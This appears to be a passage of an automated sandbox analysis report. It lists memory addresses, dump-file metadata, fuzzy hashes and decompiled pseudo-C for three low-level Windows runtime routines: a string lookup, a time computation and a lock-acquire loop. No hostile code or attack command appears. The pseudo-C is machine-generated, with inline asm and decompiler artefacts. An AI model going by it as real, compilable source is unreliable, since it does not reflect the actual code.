                                                                                                                                0x04f40ea7
                                                                                                                                0x04f40eaf
                                                                                                                                0x04f40eb3
                                                                                                                                0x04f40eb9
                                                                                                                                0x04f40eb9
                                                                                                                                0x04f40ebc
                                                                                                                                0x04f40ecd
                                                                                                                                0x04f40ecd
                                                                                                                                0x00000000
                                                                                                                                0x04f40eb3
                                                                                                                                0x04f40e21
                                                                                                                                0x04f40e2b
                                                                                                                                0x04f40e2f
                                                                                                                                0x04f40e30
                                                                                                                                0x04f40e3a
                                                                                                                                0x04f40e3f
                                                                                                                                0x04f40e41
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f40e47
                                                                                                                                0x00000000
                                                                                                                                0x04f40e47
                                                                                                                                0x04f40df9
                                                                                                                                0x04f40dfe
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f40dfe
                                                                                                                                0x04ee5303
                                                                                                                                0x04ee5307
                                                                                                                                0x00000000
                                                                                                                                0x04ee5309
                                                                                                                                0x00000000
                                                                                                                                0x04ee5309
                                                                                                                                0x04ee5307
                                                                                                                                0x04ee52e9
                                                                                                                                0x04ee52e9
                                                                                                                                0x00000000
                                                                                                                                0x04ee52e9
                                                                                                                                0x04ee530e
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3477dbe45d04e58a024793a0d3f246589498f283b2394b447aa9f4971e247db7
                                                                                                                                • Instruction ID: 54848e59c8c3013b031e8057f04df3390c60a387abfda77ce408f77c7cb52681
                                                                                                                                • Opcode Fuzzy Hash: 3477dbe45d04e58a024793a0d3f246589498f283b2394b447aa9f4971e247db7
                                                                                                                                • Instruction Fuzzy Hash: 4951CD71205342AFE321EFA8CC41B27BBE5FF84718F14491AE59587651EB70F806CBA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F12AE4, Relevance: .2, Instructions: 159COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E04F12AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4fd8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4fd8208; // 0x4fd8207
				_t8 = _t57 + 0x4fd8208; // 0x4fd8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4fd8450; // 0x3003e6c
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4fd821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4fd6d5c; // 0x7f530654
							_t72 =  *0x4fd6d5c; // 0x7f530654
							_t75 =  *0x4fd6d5c; // 0x7f530654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4fd6d5c; // 0x7f530654
							_t84 =  *0x4fd6d5c; // 0x7f530654
							_t87 =  *0x4fd6d5c; // 0x7f530654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04F2F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                                                0x04f12ae4
                                                                                                                                0x04f12aec
                                                                                                                                0x04f12aef
                                                                                                                                0x04f12af4
                                                                                                                                0x04f12af7
                                                                                                                                0x04f12afd
                                                                                                                                0x04f12b92
                                                                                                                                0x04f12b92
                                                                                                                                0x04f12b97
                                                                                                                                0x04f12b9c
                                                                                                                                0x04f12b9c
                                                                                                                                0x04f12b03
                                                                                                                                0x04f12b06
                                                                                                                                0x04f12b09
                                                                                                                                0x04f12b09
                                                                                                                                0x04f12b0f
                                                                                                                                0x04f12b15
                                                                                                                                0x04f12b15
                                                                                                                                0x04f12b1b
                                                                                                                                0x04f12b1e
                                                                                                                                0x04f12b21
                                                                                                                                0x04f12b26
                                                                                                                                0x04f12b29
                                                                                                                                0x04f12b81
                                                                                                                                0x04f12b84
                                                                                                                                0x04f12c0e
                                                                                                                                0x04f12c15
                                                                                                                                0x04f12c24
                                                                                                                                0x04f12c24
                                                                                                                                0x04f12b8a
                                                                                                                                0x04f12b8a
                                                                                                                                0x04f12b8a
                                                                                                                                0x04f12b8a
                                                                                                                                0x04f12b90
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f12b4a
                                                                                                                                0x04f12b4a
                                                                                                                                0x04f12b4d
                                                                                                                                0x04f12b53
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f12b55
                                                                                                                                0x04f12b58
                                                                                                                                0x04f12bb7
                                                                                                                                0x04f55d1b
                                                                                                                                0x04f55d37
                                                                                                                                0x04f55d47
                                                                                                                                0x04f55d53
                                                                                                                                0x04f12bbd
                                                                                                                                0x04f12bbd
                                                                                                                                0x04f12bbd
                                                                                                                                0x04f12bb7
                                                                                                                                0x04f12b5d
                                                                                                                                0x04f12c2f
                                                                                                                                0x04f55d5b
                                                                                                                                0x04f55d77
                                                                                                                                0x04f55d87
                                                                                                                                0x04f55d93
                                                                                                                                0x04f12c35
                                                                                                                                0x04f12c35
                                                                                                                                0x04f12c35
                                                                                                                                0x04f12c2f
                                                                                                                                0x04f12b65
                                                                                                                                0x04f12b9f
                                                                                                                                0x04f12ba2
                                                                                                                                0x04f12b67
                                                                                                                                0x04f12b67
                                                                                                                                0x04f12b69
                                                                                                                                0x04f12b6b
                                                                                                                                0x04f12b6e
                                                                                                                                0x04f12bc9
                                                                                                                                0x04f12bcc
                                                                                                                                0x04f12bcf
                                                                                                                                0x04f12bd4
                                                                                                                                0x04f12bd6
                                                                                                                                0x04f12bd6
                                                                                                                                0x04f12bdb
                                                                                                                                0x04f12c02
                                                                                                                                0x04f12c05
                                                                                                                                0x04f12c07
                                                                                                                                0x00000000
                                                                                                                                0x04f12c07
                                                                                                                                0x04f12be0
                                                                                                                                0x04f12c00
                                                                                                                                0x04f12c3f
                                                                                                                                0x04f12c3f
                                                                                                                                0x00000000
                                                                                                                                0x04f12c00
                                                                                                                                0x04f12be5
                                                                                                                                0x04f12be7
                                                                                                                                0x04f12bec
                                                                                                                                0x04f12bf4
                                                                                                                                0x04f12bf6
                                                                                                                                0x00000000
                                                                                                                                0x04f12bf6
                                                                                                                                0x04f12b70
                                                                                                                                0x04f12b76
                                                                                                                                0x04f12b2b
                                                                                                                                0x04f12b2b
                                                                                                                                0x04f12b2d
                                                                                                                                0x04f12b2f
                                                                                                                                0x04f12b32
                                                                                                                                0x04f12b35
                                                                                                                                0x04f12b3a
                                                                                                                                0x00000000
                                                                                                                                0x04f12b40
                                                                                                                                0x04f12b43
                                                                                                                                0x04f12b45
                                                                                                                                0x04f12b47
                                                                                                                                0x04f12b4a
                                                                                                                                0x04f12b4d
                                                                                                                                0x04f12b53
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f12b53
                                                                                                                                0x04f12b78
                                                                                                                                0x04f12b78
                                                                                                                                0x04f12b7b
                                                                                                                                0x04f12b7e
                                                                                                                                0x00000000
                                                                                                                                0x04f12b7e
                                                                                                                                0x04f12b76
                                                                                                                                0x04f12ba5
                                                                                                                                0x04f12ba5
                                                                                                                                0x04f12ba8
                                                                                                                                0x04f12bad
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f12baf
                                                                                                                                0x04f12baf
                                                                                                                                0x04f12bc2
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 56d07458f801d3da00a04264c72950a485029b13f43d7af64435dc67f5e2fc34
                                                                                                                                • Instruction ID: 02760c1bdd7d681578b36eef4839f25375fefb842f2bf351468b7e9599ea5053
                                                                                                                                • Opcode Fuzzy Hash: 56d07458f801d3da00a04264c72950a485029b13f43d7af64435dc67f5e2fc34
                                                                                                                                • Instruction Fuzzy Hash: C951B376B001158FCB18CF5CD8909BDB7B2FB88700716859AE856EB364E734BE52DB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F0DBE9, Relevance: .1, Instructions: 149COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 86%
                                                                                                                                			E04F0DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04EECC50(E04EE4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04F07D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04FB8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04F02280(_t58, _v44);
						E04F0DD82(_v44, _t102, _t98);
						E04F0B944(_t102, _v5);
						return E04EFFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4fd8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4fd862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4fd8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4fd862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4fafb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                                                0x04f0dbe9
                                                                                                                                0x04f0dbf2
                                                                                                                                0x04f0dbf7
                                                                                                                                0x04f0dbf9
                                                                                                                                0x04f0dbfc
                                                                                                                                0x04f0dc00
                                                                                                                                0x04f0dc03
                                                                                                                                0x04f0dc14
                                                                                                                                0x04f0dd54
                                                                                                                                0x04f0dd54
                                                                                                                                0x04f0dd54
                                                                                                                                0x04f0dc18
                                                                                                                                0x04f0dc1d
                                                                                                                                0x04f0dc1d
                                                                                                                                0x04f0dc32
                                                                                                                                0x04f0dc3b
                                                                                                                                0x04f0dc3e
                                                                                                                                0x04f0dc46
                                                                                                                                0x04f0dd5b
                                                                                                                                0x04f0dd62
                                                                                                                                0x04f0dd64
                                                                                                                                0x04f0dd67
                                                                                                                                0x04f0dd69
                                                                                                                                0x04f0dd6b
                                                                                                                                0x04f0dd6e
                                                                                                                                0x04f0dd70
                                                                                                                                0x04f0dd73
                                                                                                                                0x04f0dd73
                                                                                                                                0x00000000
                                                                                                                                0x04f0dc4c
                                                                                                                                0x04f0dc4e
                                                                                                                                0x04f53ae3
                                                                                                                                0x04f53ae8
                                                                                                                                0x04f53aea
                                                                                                                                0x04f0dce7
                                                                                                                                0x04f0dce9
                                                                                                                                0x04f0dcec
                                                                                                                                0x04f0dcee
                                                                                                                                0x04f0dcf0
                                                                                                                                0x04f0dcf3
                                                                                                                                0x04f0dcf5
                                                                                                                                0x04f53af2
                                                                                                                                0x04f53af5
                                                                                                                                0x04f53af5
                                                                                                                                0x04f0dd06
                                                                                                                                0x04f0dd08
                                                                                                                                0x04f0dd0b
                                                                                                                                0x04f0dd12
                                                                                                                                0x04f53b08
                                                                                                                                0x04f0dd18
                                                                                                                                0x04f0dd18
                                                                                                                                0x04f0dd18
                                                                                                                                0x04f0dd20
                                                                                                                                0x04f0dd23
                                                                                                                                0x04f53b16
                                                                                                                                0x04f53b16
                                                                                                                                0x04f0dd29
                                                                                                                                0x04f0dd2d
                                                                                                                                0x04f0dd36
                                                                                                                                0x04f0dd40
                                                                                                                                0x04f0dd51
                                                                                                                                0x04f0dd51
                                                                                                                                0x04f0dc54
                                                                                                                                0x04f0dc59
                                                                                                                                0x04f0dc59
                                                                                                                                0x04f0dc5e
                                                                                                                                0x04f0dc5e
                                                                                                                                0x04f0dc63
                                                                                                                                0x04f0dc66
                                                                                                                                0x04f0dc6b
                                                                                                                                0x04f0dc78
                                                                                                                                0x04f0dc7b
                                                                                                                                0x04f0dc81
                                                                                                                                0x04f0dc81
                                                                                                                                0x04f0dc83
                                                                                                                                0x04f0dc89
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f0dd7b
                                                                                                                                0x04f0dd7b
                                                                                                                                0x04f0dc8f
                                                                                                                                0x04f0dc8f
                                                                                                                                0x04f0dc92
                                                                                                                                0x04f0dc99
                                                                                                                                0x04f0dc9f
                                                                                                                                0x04f0dca5
                                                                                                                                0x04f0dcaa
                                                                                                                                0x04f0dcaa
                                                                                                                                0x04f0dcb3
                                                                                                                                0x04f0dcb8
                                                                                                                                0x04f0dcbb
                                                                                                                                0x04f0dcc1
                                                                                                                                0x04f0dccf
                                                                                                                                0x04f0dcd2
                                                                                                                                0x04f0dcd5
                                                                                                                                0x04f0dcd7
                                                                                                                                0x04f0dcda
                                                                                                                                0x04f0dcdc
                                                                                                                                0x04f0dcdc
                                                                                                                                0x04f0dce2
                                                                                                                                0x04f0dce4
                                                                                                                                0x00000000
                                                                                                                                0x04f0dce4

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a4498661c16b1c25e0387388f7bcac57f0342ff3425c1a4779cb78687fc4215
                                                                                                                                • Instruction ID: 6ca898019e2e615d81c8a7c296f11b8f6e44b0051c9c6c112c0f573e5de384a7
                                                                                                                                • Opcode Fuzzy Hash: 8a4498661c16b1c25e0387388f7bcac57f0342ff3425c1a4779cb78687fc4215
                                                                                                                                • Instruction Fuzzy Hash: 7B517F75E01605DFCB14DFA8C880AAEBBF5BB88350F20C55AD955A7384EB30BD46DB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EFEF40, Relevance: .1, Instructions: 147COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 96%
                                                                                                                                			E04EFEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04EE9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04EE2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                                                0x04efef4b
                                                                                                                                0x04efef4d
                                                                                                                                0x04efef57
                                                                                                                                0x04eff0bd
                                                                                                                                0x04eff0c2
                                                                                                                                0x04eff0d2
                                                                                                                                0x04eff0d2
                                                                                                                                0x04eff0c2
                                                                                                                                0x04efef5d
                                                                                                                                0x04efef5f
                                                                                                                                0x04efef67
                                                                                                                                0x04efef6a
                                                                                                                                0x04efef6d
                                                                                                                                0x04efef74
                                                                                                                                0x04efef7f
                                                                                                                                0x04efef82
                                                                                                                                0x04efef82
                                                                                                                                0x04efef86
                                                                                                                                0x04efef88
                                                                                                                                0x04efef8c
                                                                                                                                0x04efef8f
                                                                                                                                0x04efef8f
                                                                                                                                0x04efef8f
                                                                                                                                0x00000000
                                                                                                                                0x04efef91
                                                                                                                                0x04efef93
                                                                                                                                0x04efefc4
                                                                                                                                0x04efefc4
                                                                                                                                0x04efefc4
                                                                                                                                0x04efefca
                                                                                                                                0x04efefd0
                                                                                                                                0x04eff0a6
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04eff0af
                                                                                                                                0x04f4bb06
                                                                                                                                0x04f4bb0a
                                                                                                                                0x04eff0b5
                                                                                                                                0x04eff0b5
                                                                                                                                0x04eff0b5
                                                                                                                                0x04eff0b5
                                                                                                                                0x00000000
                                                                                                                                0x04efefd6
                                                                                                                                0x04efefd9
                                                                                                                                0x04eff0de
                                                                                                                                0x04eff0e2
                                                                                                                                0x04efefdf
                                                                                                                                0x04efefdf
                                                                                                                                0x04efefdf
                                                                                                                                0x04efefe5
                                                                                                                                0x04f4bafc
                                                                                                                                0x04f4bafc
                                                                                                                                0x04efefe5
                                                                                                                                0x04efefeb
                                                                                                                                0x04efefed
                                                                                                                                0x04eff00f
                                                                                                                                0x04eff011
                                                                                                                                0x04eff01a
                                                                                                                                0x04eff01d
                                                                                                                                0x04eff021
                                                                                                                                0x04eff028
                                                                                                                                0x04eff029
                                                                                                                                0x04eff029
                                                                                                                                0x04eff02c
                                                                                                                                0x00000000
                                                                                                                                0x04eff02c
                                                                                                                                0x04efeff3
                                                                                                                                0x04efeff9
                                                                                                                                0x04eff0ea
                                                                                                                                0x04eff0ed
                                                                                                                                0x04eff0ef
                                                                                                                                0x00000000
                                                                                                                                0x04eff0ef
                                                                                                                                0x04eff003
                                                                                                                                0x04f4bb12
                                                                                                                                0x04eff045
                                                                                                                                0x04eff049
                                                                                                                                0x04eff051
                                                                                                                                0x04eff09e
                                                                                                                                0x04eff0a0
                                                                                                                                0x04eff0a0
                                                                                                                                0x04eff09e
                                                                                                                                0x04eff053
                                                                                                                                0x04eff064
                                                                                                                                0x04eff064
                                                                                                                                0x04eff06b
                                                                                                                                0x04f4bb1a
                                                                                                                                0x04f4bb1a
                                                                                                                                0x04eff071
                                                                                                                                0x04eff071
                                                                                                                                0x04eff07d
                                                                                                                                0x04eff082
                                                                                                                                0x04eff08f
                                                                                                                                0x04eff08f
                                                                                                                                0x04eff009
                                                                                                                                0x04eff00d
                                                                                                                                0x00000000
                                                                                                                                0x04eff00d
                                                                                                                                0x04efefd0
                                                                                                                                0x04efef97
                                                                                                                                0x04efefa5
                                                                                                                                0x04efefaa
                                                                                                                                0x00000000
                                                                                                                                0x04efefac
                                                                                                                                0x04efefac
                                                                                                                                0x04efefac
                                                                                                                                0x00000000
                                                                                                                                0x04efefb2
                                                                                                                                0x04eff036
                                                                                                                                0x04eff03a
                                                                                                                                0x04eff040
                                                                                                                                0x04eff090
                                                                                                                                0x00000000
                                                                                                                                0x04eff092
                                                                                                                                0x04eff042
                                                                                                                                0x00000000
                                                                                                                                0x04eff042
                                                                                                                                0x04efefb7
                                                                                                                                0x04efefb9
                                                                                                                                0x04efefbc
                                                                                                                                0x04efefb0
                                                                                                                                0x04efefb0
                                                                                                                                0x00000000
                                                                                                                                0x04efefbe
                                                                                                                                0x04efefbe
                                                                                                                                0x04efefc1
                                                                                                                                0x00000000
                                                                                                                                0x04efefc1
                                                                                                                                0x04efefbc
                                                                                                                                0x04efefaa
                                                                                                                                0x04efef91

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
